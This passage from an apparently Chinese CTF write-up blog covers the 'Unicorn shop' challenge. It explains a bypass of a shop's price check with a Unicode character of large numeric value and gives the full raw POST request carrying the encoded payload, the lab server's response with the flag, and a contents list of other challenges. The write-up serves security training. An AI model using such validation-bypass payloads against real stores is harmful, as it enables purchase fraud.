GET /index.html?yds=flag

[ASIS 2019]Unicorn shop

和[SUCTF 2019]Pythonginx 差不多

题目里1-3应该是没有的,只要4还在。

可以在https://www.compart.com/en/unicode/search?q=thousand#characters 搜索

image-20200802041335168

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
POST /charge HTTP/1.1
Host: 39cdace4-94e5-49c3-a6fb-796279314616.node3.buuoj.cn
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://39cdace4-94e5-49c3-a6fb-796279314616.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://39cdace4-94e5-49c3-a6fb-796279314616.node3.buuoj.cn/charge
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

id=4&price=%25E2%2586%2588




HTTP/1.1 200 OK
Server: openresty
Date: Sat, 01 Aug 2020 20:15:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2572
Connection: close

<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8"><!--Ah,really important,seriously. -->
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Unicorn shop</title>
<!-- Don't be frustrated by the same view,we've changed the challenge content.-->
<!-- Bootstrap core CSS -->
<link href="/static/css/bootstrap.min.css?v=ec3bb52a00e176a7181d454dffaea219" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="/static/css/jumbotron-narrow.css?v=166844ff66a82256d62737c8a6fc14bf" rel="stylesheet">
</head>
<!--We still have some surprise for admin.password-->
<body>
<div class="container">


<div class="alert alert-success alert-dismissable">
操作成功。
</div>


<div class="alert alert-success alert-dismissable">
flag{20386a66-bd60-4439-962d-962f7d6122fd}
</div>
CATALOG
  1. 1. 0x01 周
    1. 1.1. web
      1. 1.1.1. [极客大挑战 2019]Secret File
      2. 1.1.2. [极客大挑战 2019]PHP
      3. 1.1.3. [极客大挑战 2019]LoveSQL
      4. 1.1.4. 极客大挑战 2019]Knife
  2. 2. 0x02周
    1. 2.1. web
      1. 2.1.1. [网鼎杯 2018]Fakebook
      2. 2.1.2. [极客大挑战 2019]Http
      3. 2.1.3. [GXYCTF2019]Ping Ping Ping
      4. 2.1.4. [ACTF2020 新生赛]Include
      5. 2.1.5. [极客大挑战 2019]BabySQL
      6. 2.1.6. [极客大挑战 2019]BuyFlag
      7. 2.1.7. [ACTF2020 新生赛]Exec
      8. 2.1.8. [ZJCTF 2019]NiZhuanSiWe
      9. 2.1.9. [极客大挑战 2019]Upload
      10. 2.1.10. [RoarCTF 2019]Easy Java
      11. 2.1.11. [BJDCTF2020]Easy MD5
        1. 2.1.11.1. 0x01
        2. 2.1.11.2. 0x02
        3. 2.1.11.3. 0x03
      12. 2.1.12. [ACTF2020 新生赛]BackupFile
      13. 2.1.13. [BUUCTF 2018]Online Tool
  3. 3. 0x03周
    1. 3.1. web
      1. 3.1.1. [网鼎杯 2020 青龙组]AreUSerialz
      2. 3.1.2. [网鼎杯 2020 青龙组]filejava
      3. 3.1.3. [网鼎杯 2020 朱雀组]phpweb
    2. 3.2. crypto
      1. 3.2.1. [网鼎杯 2020 青龙组]you_raise_me_up
      2. 3.2.2. [网鼎杯 2020 青龙组]boom
        1. 3.2.2.1. 0x01
        2. 3.2.2.2. 0x02
        3. 3.2.2.3. 0x03
  4. 4. 0x04 周
    1. 4.1. web
      1. 4.1.1. [网鼎杯 2020 青龙组]notes
      2. 4.1.2. [极客大挑战 2019]HardSQL
      3. 4.1.3. [BUUCTF 2018]Online Tool
      4. 4.1.4. [ACTF2020 新生赛]Upload
      5. 4.1.5. [GXYCTF2019]BabySQli
      6. 4.1.6. [GYCTF2020]Blacklist
      7. 4.1.7. [0CTF 2016]piapiapia
      8. 4.1.8. [GXYCTF2019]禁止套娃
      9. 4.1.9. [SUCTF 2019]Pythonginx
      10. 4.1.10. [安洵杯 2019]easy_web
      11. 4.1.11. [GWCTF 2019]我有一个数据库
      12. 4.1.12. [BJDCTF2020]Mark loves cat
      13. 4.1.13. [ASIS 2019]Unicorn shop